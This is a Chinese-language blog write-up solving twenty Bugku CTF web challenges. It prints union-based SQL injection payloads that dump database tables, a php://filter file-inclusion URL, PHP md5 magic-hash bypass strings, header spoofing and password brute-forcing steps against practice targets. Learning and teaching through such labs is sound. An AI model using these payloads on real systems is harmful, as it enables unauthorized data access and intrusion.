<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">

    

    
    <title>Bugku_web1~20题解 | OBslcogar</title>
    
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="keywords" content="CTF">
    
    <meta name="description" content="2012年4月23日哈勃太空望远镜拍摄到的大麦哲伦星云星系中的蜘蛛星云照片的合成影像。    20 成绩单很明显是sql注入。具体笔记参考我的mysql注入笔记1.先查字段：id= 1&amp;#39; order by 5#出现异常，说明有四个字段。2.id=0&amp;#39; union select 1,2,3,database()# 查询数据库名称为skctf_flag。3.id=0&amp;#39; un">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="Bugku_web1~20题解">
<meta property="og:url" content="http://yoursite.com/2019/12/23/bugku_web/index.html">
<meta property="og:site_name" content="OBslcogar">
<meta property="og:description" content="2012年4月23日哈勃太空望远镜拍摄到的大麦哲伦星云星系中的蜘蛛星云照片的合成影像。    20 成绩单很明显是sql注入。具体笔记参考我的mysql注入笔记1.先查字段：id= 1&amp;#39; order by 5#出现异常，说明有四个字段。2.id=0&amp;#39; union select 1,2,3,database()# 查询数据库名称为skctf_flag。3.id=0&amp;#39; un">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/2019/12/23/bugku_web/timg3.jpg">
<meta property="og:updated_time" content="2019-12-26T12:24:58.640Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Bugku_web1~20题解">
<meta name="twitter:description" content="2012年4月23日哈勃太空望远镜拍摄到的大麦哲伦星云星系中的蜘蛛星云照片的合成影像。    20 成绩单很明显是sql注入。具体笔记参考我的mysql注入笔记1.先查字段：id= 1&amp;#39; order by 5#出现异常，说明有四个字段。2.id=0&amp;#39; union select 1,2,3,database()# 查询数据库名称为skctf_flag。3.id=0&amp;#39; un">
<meta name="twitter:image" content="http://yoursite.com/2019/12/23/bugku_web/timg3.jpg">
    

    
        <link rel="alternate" href="/" title="OBslcogar" type="application/atom+xml">
    

    

    <link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">
    <link rel="stylesheet" href="/libs/titillium-web/styles.css">
    <link rel="stylesheet" href="/libs/source-code-pro/styles.css">

    <link rel="stylesheet" href="/css/style.css">

    <script src="/libs/jquery/3.4.1/jquery.min.js"></script>
    
    
        <link rel="stylesheet" href="/libs/lightgallery/css/lightgallery.min.css">
    
    
        <link rel="stylesheet" href="/libs/justified-gallery/justifiedGallery.min.css">
    
    
    


</head>
</html>
<body>
    <div id="wrap">
        <header id="header">
    <div id="header-outer" class="outer">
        <div class="container">
            <div class="container-inner">
                <div id="header-title">
                    <h1 class="logo-wrap">
                        <a href="/" class="logo"></a>
                    </h1>
                    
                </div>
                <div id="header-inner" class="nav-container">
                    <a id="main-nav-toggle" class="nav-icon fa fa-bars"></a>
                    <div class="nav-container-inner">
                        <ul id="main-nav">
                            
                                <li class="main-nav-list-item" >
                                    <a class="main-nav-list-link" href="/">主页</a>
                                </li>
                            
                                        <ul class="main-nav-list"><li class="main-nav-list-item"><a class="main-nav-list-link" href="/categories/CTF/">CTF</a></li><li class="main-nav-list-item"><a class="main-nav-list-link" href="/categories/hexo/">hexo</a></li><li class="main-nav-list-item"><a class="main-nav-list-link" href="/categories/xxx/">xxx</a></li></ul>
                                    
                                <li class="main-nav-list-item" >
                                    <a class="main-nav-list-link" href="/board/index.html">更新文章</a>
                                </li>
                            
                                <li class="main-nav-list-item" >
                                    <a class="main-nav-list-link" href="/about/index.html">关于我</a>
                                </li>
                            
                        </ul>
                        <nav id="sub-nav">
                            <div id="search-form-wrap">

    <form class="search-form">
        <input type="text" class="ins-search-input search-form-input" placeholder="搜索" />
        <button type="submit" class="search-form-submit"></button>
    </form>
    <div class="ins-search">
    <div class="ins-search-mask"></div>
    <div class="ins-search-container">
        <div class="ins-input-wrapper">
            <input type="text" class="ins-search-input" placeholder="想要查找什么..." />
            <span class="ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: '文章',
            PAGES: '页面',
            CATEGORIES: '分类',
            TAGS: '标签',
            UNTITLED: '(未命名)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>
<script src="/js/insight.js"></script>

</div>
                        </nav>
                    </div>
                </div>
            </div>
        </div>
    </div>
</header>
        <div class="container">
            <div class="main-body container-inner">
                <div class="main-body-inner">
                    <section id="main">
                        <div class="main-body-header">
    <h1 class="header">
    
    <a class="page-title-link" href="/categories/CTF/">CTF</a>
    </h1>
</div>

                        <div class="main-body-content">
                            <article id="post-bugku_web" class="article article-single article-type-post" itemscope itemprop="blogPost">
    <div class="article-inner">
        
            <header class="article-header">
                
    
        <h1 class="article-title" itemprop="name">
        Bugku_web1~20题解
        </h1>
    

            </header>
        
        
            <div class="article-meta">
                
    <div class="article-date">
      <i class="fa fa-calendar"></i>
      <a href="/2019/12/23/bugku_web/" class="article-date">
         <time datetime="2019-12-23T08:32:23.000Z" itemprop="datePublished">2019-12-23</time>
      </a>
    </div>


                

                
    <div class="article-tag">
        <i class="fa fa-tag"></i>
        <a class="tag-link" href="/tags/CTF/">CTF</a>
    </div>

                

                

            </div>
        
        
        <div class="article-entry" itemprop="articleBody">
            <p><img src="/2019/12/23/bugku_web/timg3.jpg" alt></p>
<center>
<font face="楷体" size="2">2012年4月23日哈勃太空望远镜拍摄到的大麦哲伦星云星系中的蜘蛛星云照片的合成影像。 </font>
</center>

<h1 id="20-成绩单"><a href="#20-成绩单" class="headerlink" title="20 成绩单"></a>20 成绩单</h1><p>很明显是sql注入。<br>具体笔记参考我的mysql注入笔记<br>1.先查字段：<code>id= 1&#39; order by 5#</code>出现异常，说明有四个字段。<br>2.<code>id=0&#39; union select 1,2,3,database()#</code> 查询数据库名称为skctf_flag。<br>3.<code>id=0&#39; union select 1,group_concat(TABLE_NAME),3,4 from information_schema.tables where table_schema=database() #</code><br>爆出表名fl4g,sc。<br>4.<code>id=0&#39; union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=&#39;fl4g&#39; #</code> 爆字段名skctf_flag。<br>5.<code>id=0&#39; union select 1,2,3,skctf_flag from fl4g#</code> 查询字段，得出flag。<br><img src="/2019/12/23/bugku_web/i31.jpg" alt></p>
<h1 id="19-备份是个好习惯"><a href="#19-备份是个好习惯" class="headerlink" title="19 备份是个好习惯"></a>19 备份是个好习惯</h1><p><img src="/2019/12/23/bugku_web/i30.jpg" alt> </p>
<p>打开页面是一串重复的md5，解密之后是空值，没什么用处。<br>那么就根据提示查找一下备份文件（.bak）通过尝试输入或者扫后台都可以得到一份下载的文件。<br>打开后源码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Created by PhpStorm.</span></span><br><span class="line"><span class="comment"> * User: Norse</span></span><br><span class="line"><span class="comment"> * Date: 2017/8/6</span></span><br><span class="line"><span class="comment"> * Time: 20:22</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">include_once</span> <span class="string">"flag.php"</span>;</span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = strstr($_SERVER[<span class="string">'REQUEST_URI'</span>], <span class="string">'?'</span>);<span class="comment">//设置变量str的值为url中?后面的字符串</span></span><br><span class="line">$str = substr($str,<span class="number">1</span>);<span class="comment">//str为str中第一位开始的字符串</span></span><br><span class="line">$str = str_replace(<span class="string">'key'</span>,<span class="string">''</span>,$str);<span class="comment">//key替换为空</span></span><br><span class="line">parse_str($str);<span class="comment">//str字符串解析为变量</span></span><br><span class="line"><span class="keyword">echo</span> md5($key1);</span><br><span class="line"><span class="keyword">echo</span> md5($key2);</span><br><span class="line"><span class="comment">//如果key1和key2的Md5加密值相等 但是原值不等就得到flag</span></span><br><span class="line"><span class="keyword">if</span>(md5($key1) == md5($key2) &amp;&amp; $key1 !== $key2)&#123;</span><br><span class="line">    <span class="keyword">echo</span> $flag.<span class="string">"取得flag"</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>


<p>所以我们首先传值的时候不能用key 可以用kkeyey，最后会变成key<br>第二就是满足if判断，有两种解决办法：<br>1.使用数组绕过<br>md5解析的数组都是NULL值，正好满足相等。<br>2.利用==弱比较漏洞<br>只要解析之后是0e开头的话会被认定为科学计数法，且表示的是<strong>0*10的xxxx次方，还是零</strong>，都是相等的。<br>下列的字符串的MD5值都是0e开头的：<br>QNKCDZO</p>
<p>240610708</p>
<p>s878926199a</p>
<p>s155964671a</p>
<p>s214587387a</p>
<p>s214587387a </p>
<p>所以开始打开页面显示的两个NULL也就是此时key1key2都没有值。</p>
<h1 id="18-点击一百万次"><a href="#18-点击一百万次" class="headerlink" title="18 点击一百万次"></a>18 点击一百万次</h1><p>POST传参即可<br><code>click=100001</code></p>
<p><img src="/2019/12/23/bugku_web/i29.jpg" alt></p>
<h1 id="17-输入密码查看flag"><a href="#17-输入密码查看flag" class="headerlink" title="17 输入密码查看flag"></a>17 输入密码查看flag</h1><p>爆破就完事啦。</p>
<h1 id="16-flag在index里"><a href="#16-flag在index里" class="headerlink" title="16 flag在index里"></a>16 flag在index里</h1><p>本题的知识点：本地文件包含漏洞 PHP伪协议。</p>
<p><img src="/2019/12/23/bugku_web/i25.jpg" alt></p>
<p>进入网页点击之后可以观察到url地址后方有一个file，这就是关键字。<br>这里先放出解出结果的payload:<br><a href="http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php" target="_blank" rel="noopener">http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php</a><br>访问后会得到一段base64编码，解码就可以得到flag。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">    &lt;title&gt;Bugku-ctf&lt;/title&gt;</span><br><span class="line">    </span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	error_reporting(<span class="number">0</span>);</span><br><span class="line">	<span class="keyword">if</span>(!$_GET[file])&#123;<span class="keyword">echo</span> <span class="string">'&lt;a href="./index.php?file=show.php"&gt;click me? no&lt;/a&gt;'</span>;&#125;</span><br><span class="line">	$file=$_GET[<span class="string">'file'</span>];</span><br><span class="line">	<span class="keyword">if</span>(strstr($file,<span class="string">"../"</span>)||stristr($file, <span class="string">"tp"</span>)||stristr($file,<span class="string">"input"</span>)||stristr($file,<span class="string">"data"</span>))&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"Oh no!"</span>;</span><br><span class="line">		<span class="keyword">exit</span>();</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">include</span>($file); </span><br><span class="line"><span class="comment">//flag:flag&#123;edulcni_elif_lacol_si_siht&#125;</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/2019/12/23/bugku_web/i26.jpg" alt></p>
<p>接下来解释一下原理:</p>
<pre><code>?file= get传参
php://是一个协议
php://filter/是可以访问本地的协议
read=convert.base64-encode/转换过滤器，是表示以base编码后的方式读取源码（如果不编码的话会当成PHP语句而执行）
resource=index.php表示目标文件为index.php</code></pre><p>源码中的include()函数的意思是执行()中的文件，无法执行或不成功会返回文件的源码。<br>这里include的内容可以自己选，我们file传的参数是该函数引入了index.php的base64编码，无法执行所以返回编码后的值。<br><img src="/2019/12/23/bugku_web/i27.jpg" alt><br><img src="/2019/12/23/bugku_web/i28.jpg" alt><br>参考网页：<br><a href="https://www.php.net/manual/zh/wrappers.php.php" target="_blank" rel="noopener">php://协议</a><br><a href="https://www.php.net/manual/zh/filters.convert.php" target="_blank" rel="noopener">转换过滤器</a><br><a href="https://www.leavesongs.com/PENETRATION/php-filter-magic.html" target="_blank" rel="noopener">php://妙用</a><br><a href="https://blog.csdn.net/zpy1998zpy/article/details/80585443" target="_blank" rel="noopener">某博客</a>  </p>
<h1 id="15-web4"><a href="#15-web4" class="headerlink" title="15 web4"></a>15 web4</h1><p>首先查看源码，发现这里有特殊的地方，直接百度escape。  </p>
<p><img src="/2019/12/23/bugku_web/i22.jpg" alt></p>
<p>是一种加密方式，可以在线解密。<br><a href="https://escape.supfree.net/" target="_blank" rel="noopener">unescape解码</a></p>
<p><img src="/2019/12/23/bugku_web/i23.jpg" alt>  </p>
<p>根据源码提示可以写出答案，submit即可。</p>
<p><img src="/2019/12/23/bugku_web/i24.jpg" alt></p>
<h1 id="14-管理员系统"><a href="#14-管理员系统" class="headerlink" title="14 管理员系统"></a>14 管理员系统</h1><p>是一个登陆的页面，F12检查元素的时候看见了一行base64注释，<br>解密为test123,应该管理员的密码。<br>根据提示：IP禁止访问，请联系本地管理员登陆，IP已被记录.</p>
<p><img src="/2019/12/23/bugku_web/i20.jpg" alt>  </p>
<p>应该想到X-Forwarded-For:  </p>
<pre><code>简称XFF头，它代表客户端，也就是HTTP的请求端真实的IP </code></pre><p>所以我们伪造一个XFF头，伪装成本地登录就可以了：<br><code>X-Forwarded-For:127.0.0.1</code> </p>
<p><img src="/2019/12/23/bugku_web/i21.jpg" alt></p>
<p>可以在header里添加，也可以直接在框中写，然后send to repeater-&gt;go就出现flag了</p>
<h1 id="13-网站被黑"><a href="#13-网站被黑" class="headerlink" title="13 网站被黑"></a>13 网站被黑</h1><p>先拿御剑扫一波后台。<br>扫到/shell.php，访问需要密码，尝试弱密码无效之后开始爆破。<br>抓包-&gt;send to intruder-&gt;选择simple list-&gt;自带的密码-&gt;start attack</p>
<p><img src="/2019/12/23/bugku_web/i16.jpg" alt> </p>
<p><img src="/2019/12/23/bugku_web/i17.jpg" alt> </p>
<p>发现了长度不同的字符，这也就是密码了。</p>
<p><img src="/2019/12/23/bugku_web/i18.jpg" alt>  </p>
<p>输入就可以得到flag。<br><img src="/2019/12/23/bugku_web/i19.jpg" alt></p>
<h1 id="12-头等舱"><a href="#12-头等舱" class="headerlink" title="12 头等舱"></a>12 头等舱</h1><p>抓包-&gt;send to repeater-&gt;go。</p>
<h1 id="11-web5"><a href="#11-web5" class="headerlink" title="11 web5"></a>11 web5</h1><p><img src="/2019/12/23/bugku_web/i13.jpg" alt> </p>
<p>打开发现是一个提交窗口<br>首先查看源码，发现了奇怪的字符。</p>
<p><img src="/2019/12/23/bugku_web/i14.jpg" alt>  </p>
<p>这里就到本题要点：jjencode 和  aaencode（颜文字）</p>
<p>什么是jjencode?</p>
<pre><code>将JS代码转换成只有符号的字符串</code></pre><p>什么是aaencode？</p>
<pre><code>将JS代码转换成常用的网络表情</code></pre><p>可以直接利用浏览器的控制台输入密文，执行后即可解密。<br><img src="/2019/12/23/bugku_web/i15.jpg" alt>  </p>
<p>不要忘记题目最后要求大写。</p>
<h1 id="10-变量1"><a href="#10-变量1" class="headerlink" title="10 变量1"></a>10 变量1</h1><p><img src="/2019/12/23/bugku_web/i10.jpg" alt><br>首先分析源码 preg_match()函数是正则表达式判断</p>
<blockquote>
<p>\w表示任意一个单词字符，即[a-zA-Z0-9_] ,+将前面的字符匹配一次或多次，$/结尾<br>所以我们不能构造eval()等函数。<br>不过在<code>var_dump($$args)</code>中，args作为了可变变量,简单理解可以认为是$($args)，可以构造超全局变量$GLOBALS,<br><code>$GLOBALS [一个包含了全部变量的全局组合数组]</code><br><img src="/2019/12/23/bugku_web/i11.jpg" alt></p>
</blockquote>
<p>我们构造args=GLOBALS，就得到flag了<br><img src="/2019/12/23/bugku_web/i12.jpg" alt></p>
<p>区分global和$GLOBALS[]：前者为变量实体 后者为别名引用</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line">$var1 = <span class="number">1</span>;  </span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">test</span><span class="params">()</span></span>&#123;  </span><br><span class="line"><span class="keyword">unset</span>($GLOBALS[<span class="string">'var1'</span>]);  </span><br><span class="line">&#125;  </span><br><span class="line">test();  </span><br><span class="line"><span class="keyword">echo</span> $var1;  </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>因为$var1被删除了，所以什么东西都没有打印。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$var1 = <span class="number">1</span>;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">test</span><span class="params">()</span></span>&#123;</span><br><span class="line"><span class="keyword">global</span> $var1;</span><br><span class="line"><span class="keyword">unset</span>($var1);</span><br><span class="line">&#125;</span><br><span class="line">test();</span><br><span class="line"><span class="keyword">echo</span> $var1;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>意外的打印了1。</p>
<p>证明删除的只是别名，$GLOBALS[‘var’]的引用，起本身的值没有受到任何的改变。`</p>
<h1 id="09-本地包含"><a href="#09-本地包含" class="headerlink" title="09 本地包含"></a>09 本地包含</h1><p>这个题我打不开。。</p>
<h1 id="08-你必须让他停下"><a href="#08-你必须让他停下" class="headerlink" title="08 你必须让他停下"></a>08 你必须让他停下</h1><p>这个题抓包就可以了，抓到包之后。<br>send to repeater-&gt; go n次（频率的原因不一定几次 十五次之内大概）就可以在右侧得到flag了。<br><img src="/2019/12/23/bugku_web/i09.jpg" alt></p>
<h1 id="07-域名解析"><a href="#07-域名解析" class="headerlink" title="07 域名解析"></a>07 域名解析</h1><p>修改：C:\Windows\System32\drivers\etc 路径下的host文件。<br><img src="/2019/12/23/bugku_web/i07.jpg" alt><br>在最下面一行加入：123.206.87.240 flag.baidu.com<br>保存后在浏览器访问：<a href="http://flag.baidu.com/" target="_blank" rel="noopener">http://flag.baidu.com/</a> 就能看到flag了。<br><img src="/2019/12/23/bugku_web/i08.jpg" alt></p>
<h1 id="06-web3"><a href="#06-web3" class="headerlink" title="06 web3"></a>06 web3</h1><p>这道题会一直弹出JS对话框，查看源码会发现注释有问题，该格式为unicode编码，转换一下就可以了。<br><a href="http://tool.chinaz.com/tools/unicode.aspx" target="_blank" rel="noopener">unicode在线转化</a><br><img src="/2019/12/23/bugku_web/i05.jpg" alt><br><img src="/2019/12/23/bugku_web/i06.jpg" alt></p>
<h1 id="05-矛盾"><a href="#05-矛盾" class="headerlink" title="05 矛盾"></a>05 矛盾</h1><p>该题主要是利<code>is_numeric()</code>函数的漏洞以及PHP的“==”0是弱类型比较（数值相等就可以了），所以构造1加上字符串来传参就可以。<br>eg:1x 1abc。<br><img src="/2019/12/23/bugku_web/i04.jpg" alt></p>
<h1 id="04-web基础-POST"><a href="#04-web基础-POST" class="headerlink" title="04 web基础$_POST"></a>04 web基础$_POST</h1><p>根据源码构造post传参即可。<br><img src="/2019/12/23/bugku_web/i03.jpg" alt> </p>
<h1 id="03-web基础-GET"><a href="#03-web基础-GET" class="headerlink" title="03 web基础$_GET"></a>03 web基础$_GET</h1><p>根据源码构造get传参即可。<br><img src="/2019/12/23/bugku_web/i02.jpg" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?变量名=变量值</span><br></pre></td></tr></table></figure>

<h1 id="02-计算器"><a href="#02-计算器" class="headerlink" title="02 计算器"></a>02 计算器</h1><p>修改maxlength 也就是输入框的长度，修改成验证码的长度就可以了。<br><img src="/2019/12/23/bugku_web/i01.jpg" alt> </p>
<h1 id="01-web2"><a href="#01-web2" class="headerlink" title="01 web2"></a>01 web2</h1><p>F12检察源码即可。</p>

        </div>
        <footer class="article-footer">
            


    <div class="a2a_kit a2a_default_style">
    <a class="a2a_dd" href="https://www.addtoany.com/share">Share</a>
    <span class="a2a_divider"></span>
    <a class="a2a_button_facebook"></a>
    <a class="a2a_button_twitter"></a>
    <a class="a2a_button_google_plus"></a>
    <a class="a2a_button_pinterest"></a>
    <a class="a2a_button_tumblr"></a>
</div>
<script type="text/javascript" src="//static.addtoany.com/menu/page.js"></script>
<style>
    .a2a_menu {
        border-radius: 4px;
    }
    .a2a_menu a {
        margin: 2px 0;
        font-size: 14px;
        line-height: 16px;
        border-radius: 4px;
        color: inherit !important;
        font-family: 'Microsoft Yahei';
    }
    #a2apage_dropdown {
        margin: 10px 0;
    }
    .a2a_mini_services {
        padding: 10px;
    }
    a.a2a_i,
    i.a2a_i {
        width: 122px;
        line-height: 16px;
    }
    a.a2a_i .a2a_svg,
    a.a2a_more .a2a_svg {
        width: 16px;
        height: 16px;
        line-height: 16px;
        vertical-align: top;
        background-size: 16px;
    }
    a.a2a_i {
        border: none !important;
    }
    a.a2a_menu_show_more_less {
        margin: 0;
        padding: 10px 0;
        line-height: 16px;
    }
    .a2a_mini_services:after{content:".";display:block;height:0;clear:both;visibility:hidden}
    .a2a_mini_services{*+height:1%;}
</style>


        </footer>
    </div>
    <script type="application/ld+json">
    {
        "@context": "https://schema.org",
        "@type": "BlogPosting",
        "author": {
            "@type": "Person",
            "name": "OYsJcHar"
        },
        "headline": "Bugku_web1~20题解",
        "image": "http://yoursite.com/2019/12/23/bugku_web/timg3.jpg",
        "keywords": "CTF",
        "genre": "CTF",
        "datePublished": "2019-12-23",
        "dateCreated": "2019-12-23",
        "dateModified": "2019-12-26",
        "url": "http://yoursite.com/2019/12/23/bugku_web/",
        "description": "

2012年4月23日哈勃太空望远镜拍摄到的大麦哲伦星云星系中的蜘蛛星云照片的合成影像。 


20 成绩单很明显是sql注入。具体笔记参考我的mysql注入笔记1.先查字段：id= 1&#39; order by 5#出现异常，说明有四个字段。2.id=0&#39; union select 1,2,3,database()# 查询数据库名称为skctf_flag。3.id=0&#39; un",
        "wordCount": 563
    }
</script>

</article>

    <section id="comments">
    
    </section>


<script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

                        </div>
                    </section>
                    <aside id="sidebar">
    <a class="sidebar-toggle" title="Expand Sidebar"><i class="toggle icon"></i></a>
    <div class="sidebar-top">
        <p>关注我 :</p>
        <ul class="social-links">
            
                
                <li>
                    <a class="social-tooltip" title="facebook" href="/" target="_blank" rel="noopener">
                        <i class="icon fa fa-facebook"></i>
                    </a>
                </li>
                
            
                
                <li>
                    <a class="social-tooltip" title="stack-overflow" href="https://github.com/OYsJcHar" target="_blank" rel="noopener">
                        <i class="icon fa fa-stack-overflow"></i>
                    </a>
                </li>
                
            
                
                <li>
                    <a class="social-tooltip" title="github" href="https://github.com/ppoffice/hexo-theme-hueman" target="_blank" rel="noopener">
                        <i class="icon fa fa-github"></i>
                    </a>
                </li>
                
            
                
                <li>
                    <a class="social-tooltip" title="weibo" href="https://weibo.com/" target="_blank" rel="noopener">
                        <i class="icon fa fa-weibo"></i>
                    </a>
                </li>
                
            
                
                <li>
                    <a class="social-tooltip" title="rss" href="/" target="_blank" rel="noopener">
                        <i class="icon fa fa-rss"></i>
                    </a>
                </li>
                
            
        </ul>
    </div>
    
        
<nav id="article-nav">
    
        <a href="/2019/12/24/skill/" id="article-nav-newer" class="article-nav-link-wrap">
        <strong class="article-nav-caption">下一篇</strong>
        <p class="article-nav-title">
        
            一些实用技巧总结（持续更新）
        
        </p>
        <i class="icon fa fa-chevron-right" id="icon-chevron-right"></i>
    </a>
    
    
        <a href="/2019/12/11/title/" id="article-nav-older" class="article-nav-link-wrap">
        <strong class="article-nav-caption">上一篇</strong>
        <p class="article-nav-title">Hexo博客的使用及markdown的语法</p>
        <i class="icon fa fa-chevron-left" id="icon-chevron-left"></i>
        </a>
    
</nav>

    
    <div class="widgets-container">
        
            
                

            
                
    <div class="widget-wrap">
        <h3 class="widget-title">最新文章</h3>
        <div class="widget">
            <ul id="recent-post" class="">
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2019/12/24/skill/" class="thumbnail">
    
    
        <span style="background-image:url(/2019/12/24/skill/timg2.jpg)" alt="一些实用技巧总结（持续更新）" class="thumbnail-image"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"></p>
                            <p class="item-title"><a href="/2019/12/24/skill/" class="title">一些实用技巧总结（持续更新）</a></p>
                            <p class="item-date"><time datetime="2019-12-24T01:53:32.000Z" itemprop="datePublished">2019-12-24</time></p>
                        </div>
                    </li>
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2019/12/23/bugku_web/" class="thumbnail">
    
    
        <span style="background-image:url(/2019/12/23/bugku_web/timg3.jpg)" alt="Bugku_web1~20题解" class="thumbnail-image"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"><a class="article-category-link" href="/categories/CTF/">CTF</a></p>
                            <p class="item-title"><a href="/2019/12/23/bugku_web/" class="title">Bugku_web1~20题解</a></p>
                            <p class="item-date"><time datetime="2019-12-23T08:32:23.000Z" itemprop="datePublished">2019-12-23</time></p>
                        </div>
                    </li>
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2019/12/11/title/" class="thumbnail">
    
    
        <span style="background-image:url(/2019/12/11/title/timg.jpg)" alt="Hexo博客的使用及markdown的语法" class="thumbnail-image"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"><a class="article-category-link" href="/categories/hexo/">hexo</a></p>
                            <p class="item-title"><a href="/2019/12/11/title/" class="title">Hexo博客的使用及markdown的语法</a></p>
                            <p class="item-date"><time datetime="2019-12-11T13:04:23.000Z" itemprop="datePublished">2019-12-11</time></p>
                        </div>
                    </li>
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2019/12/08/aaa/" class="thumbnail">
    
    
        <span style="background-image:url(/2019/12/08/aaa/a.jpg)" alt="BLOG" class="thumbnail-image"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"><a class="article-category-link" href="/categories/xxx/">xxx</a></p>
                            <p class="item-title"><a href="/2019/12/08/aaa/" class="title">BLOG</a></p>
                            <p class="item-date"><time datetime="2019-12-08T14:40:25.000Z" itemprop="datePublished">2019-12-08</time></p>
                        </div>
                    </li>
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2019/10/06/hello-world/" class="thumbnail">
    
    
        <span class="thumbnail-image thumbnail-none"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"></p>
                            <p class="item-title"><a href="/2019/10/06/hello-world/" class="title">Hello World</a></p>
                            <p class="item-date"><time datetime="2019-10-06T13:45:30.217Z" itemprop="datePublished">2019-10-06</time></p>
                        </div>
                    </li>
                
            </ul>
        </div>
    </div>

            
                
    <div class="widget-wrap widget-list">
        <h3 class="widget-title">分类</h3>
        <div class="widget">
            <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/hexo/">hexo</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/xxx/">xxx</a><span class="category-list-count">1</span></li></ul>
        </div>
    </div>


            
                
    <div class="widget-wrap widget-list">
        <h3 class="widget-title">归档</h3>
        <div class="widget">
            <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">十二月 2019</a><span class="archive-list-count">4</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">十月 2019</a><span class="archive-list-count">1</span></li></ul>
        </div>
    </div>


            
                
    <div class="widget-wrap widget-list">
        <h3 class="widget-title">标签</h3>
        <div class="widget">
